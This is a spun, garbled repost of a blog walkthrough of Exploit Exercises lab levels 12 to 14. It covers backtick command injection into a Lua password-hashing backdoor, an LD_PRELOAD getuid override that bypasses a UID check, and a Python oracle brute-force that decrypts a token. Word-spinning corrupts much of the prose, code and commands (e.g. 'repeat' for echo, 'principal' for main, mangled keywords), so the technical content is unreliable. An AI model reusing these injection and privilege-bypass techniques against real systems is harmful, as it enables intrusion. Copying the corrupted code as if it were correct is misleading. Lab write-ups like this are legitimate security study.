Popen Communicate Password Characters Passwordsorry Try Again
Later on quite some time of not doing much more working at my new job & playing dota, I felt similar taking it upon myself to complete some more exercises. I had trouble with level xi, but who cares?
level12
##Nigh
There is a backstairs process listening on port 50001.
Here's an excerpt from the code provided.
function hash ( password ) prog = io.popen ( "echo " .. password .. " | sha1sum" , "r" ) information = prog : read ( "*all" ) prog : shut () information = string.sub ( data , 1 , 40 ) return information cease So, we get to put in text for the lua-script to pass into the commandline, but we take to bargain with that pesky pipe into sha1sum at the terminate. However, the solution is to apply the aid of our old friend backticks to execute what we want.
$ telnet 127.0.0.one 50001 Trying 127.0.0.i... Connected to 127.0.0.1. Escape character is '^]'. Password: `getflag` > /tmp/level12 Better luck next time Connectedness closed by foreign host. $ cat /tmp/flag12 You lot take successfully executed getflag on a target account Bonus: Getting ii birds stoned at in one case.
Nosotros can fool this lua-script to accept our bogus countersign as the real deal by adding one or 2 commands. All nosotros need is the hash information technology's looking for & a mode to give information technology to the programme.
$ cat << EOF > /tmp/level12 4754a4f4bd5787accd33de887b9250a0691dd198 EOF $ telnet 127.0.0.1 50001 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. Password: `cat /tmp/level12`; go out Congrats, your token is 413**CARRIER LOST** Connection airtight by foreign host. When sh -c is fed the exit command, it stops execution, resulting in the abaft ` | sha1sum` dissappearing into the void. It's not the bespeak of the exercise, merely a neat thing I thought I'd share =)
level13
##About
At that place is a security cheque that prevents the program from continuing execution if the user invoking it does not match a specific user id.
Beneath is the provided C code.
#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <cord.h> #define FAKEUID yard int principal ( int argc , char ** argv , char ** envp ) { int c ; char token [ 256 ]; if ( getuid () != FAKEUID ) { printf ( "Security failure detected. UID %d started us, we expect %d \n " , getuid (), FAKEUID ); printf ( "The system administrators will be notified of this violation \n " ); go out ( EXIT_FAILURE ); } // snip, sorry :) printf ( "your token is %s \due north " , token ); } Since we're non root, we can't change our user-ID just like that. I tried to utilize LD_PRELOAD to change the part getuid to but return one thousand, merely my plans were stopped in information technology's tracks considering LD_PRELOAD is ignored by the loader if we're trying to preload on a executable nosotros don't own.
All the same, we can just brand a copy of the executable & preload it with our own version of getuid, making our hard work & sweat worthwhile.
# Define our own function /tmp/level13 $ true cat << EOF > preload.c int getuid() { return 1000; } EOF # Accept GCC turn it to a shared library. /tmp/level13 $ gcc -Wall -fPIC -shared -o preload.and then preload.c # Copy the executable to current directory & execute it, # Preloading our shared library. /tmp/level13 $ cp /abode/flag13/flag13 . /tmp/level13 $ LD_PRELOAD =./preload.so ./flag13 your token is b705702b-76a8-42b0-8844-3adabbe5ac58 # Oh hai password /tmp/level13 $ su flag13 -c getflag Countersign: You have successfully executed getflag on a target account Success! =)
level14
##About This plan resides in /dwelling house/flag14/flag14. It encrypts input and writes it to standard output. An encrypted token file is also in that home directory, decrypt information technology :)
We have to pipe input into the process & pass along the -e flag for it to spit out encrypted stuff. I also added && repeat since the program does not add a newline character at the terminate.
$ echo hi | /home/flag14/flag14 && echo hfnos Fair enough, but does the encryption change if we rerun it?
Turns out it doesn't; we yet get hfnos if we run the program again with the same input. That's good to know, we don't necesscarily have to go lucky when we endeavor to recover the used key.
If we feed the program alot of the same characters, the results indicate that the encryption is basically encrypting i character at a time, incrementing the substitution each time.
$ repeat 00000 | /home/flag14/flag14 && echo 01234 $ echo 00000000000000000000 | /home/flag14/flag14 && repeat 0123456789:;<=>?@ABC In club to decrypt the token, we just need to unroll the substitution, which is simple plenty. All we demand to know is how long the token is & what club characters are substituted.
$ wc -grand /home/flag14/token # count the characters 37 /domicile/flag14/token The start character remains unchanged by the encryption, so if we loop through all ascii characters, we can map the order of exchange. I tried to throw down some quick & simple python code to decrypt the token; according to what I knew well-nigh the encryption and then far.
The problem is that my decryption did not work. My guess is that there is something I'm missing, so I wrote a similar python script to bruteforce it instead.
import subprocess characters = """!"#$ % '()*+,-./0123456789!:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[ \ ]^_`abcdefghijklmopqrstuvwxyz{|}~""" token = "857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW." decrypted = "" iv = 0 counter = 0 land = True loopcount = 0 while len ( decrypted ) <= len ( token ): if counter == len ( token ) or loopcount == five : reencrypted = subprocess . Popen ([ "/home/flag14/flag14" , "-due east" ], stdout = subprocess . Pipage , stdin = subprocess . PIPE ) reencrypted . stdin . write ( decrypted + dc ) result = reencrypted . communicate ()[ 0 ] impress ( "token: " + token ) print ( "reencrypted:" + effect ) print ( "decrypted: " + decrypted ) exit ( 0 ) cc = token [ counter ] effort : dc = characters [ characters . index ( cc ) + iv ] except IndexError : loopcount += i country = not land 4 = 0 continue reencrypted = subprocess . Popen ([ "/home/flag14/flag14" , "-eastward" ], stdout = subprocess . PIPE , stdin = subprocess . Pipe ) reencrypted . stdin . write ( decrypted + dc ) consequence = reencrypted . communicate ()[ 0 ] if token [: len ( result )] == result : decrypted += dc counter += i elif country : iv -= 1 elif not land : iv += ane In a nutshell, the code above iterates over all characters in token, trying a substitution & reencryptning, comparison the reencrypted ciphertext to the token. If the reencrypted string matches the token and so far, it just adds that decrypted character to the decrypted variable & moves on to the next character in token. If information technology doesn't match, the script modifies the iv variable, meaning that in the next iteration of our loop will endeavour with some other graphic symbol from characters.
With my bruteforcing script in place, all that was left was to actually put all the pieces together & execute the flag as flag14
$ python bruteforce.py token: 857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW. reencrypted:857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWWD decrypted: 8457c118-887c-4e40-a5a6-33a25353165 $ su flag14 -c getflag Password: You take successfully executed getflag on a target account Recommended stuff to scout & read in regards to this level.
- Speaking with Cryptographic Oracles, by Daniel Crowley.
- What is a Cryptographic Oracle?
There you have it, I've tried solving level15 & level16, just have been unable to, so far. This Unix shell exploiting is really tricky sometimes only it'south pretty fun trying to figure out what the fuck is going on.
Cheers for reading, I'll maybe just switch over to their Protstar series of challenges, I'one thousand non sure right now :)
Source: https://jonatanhal.github.io/2015/08/09/Exploit-Exercises-12-14.html
0 Response to "Popen Communicate Password Characters Passwordsorry Try Again"
Post a Comment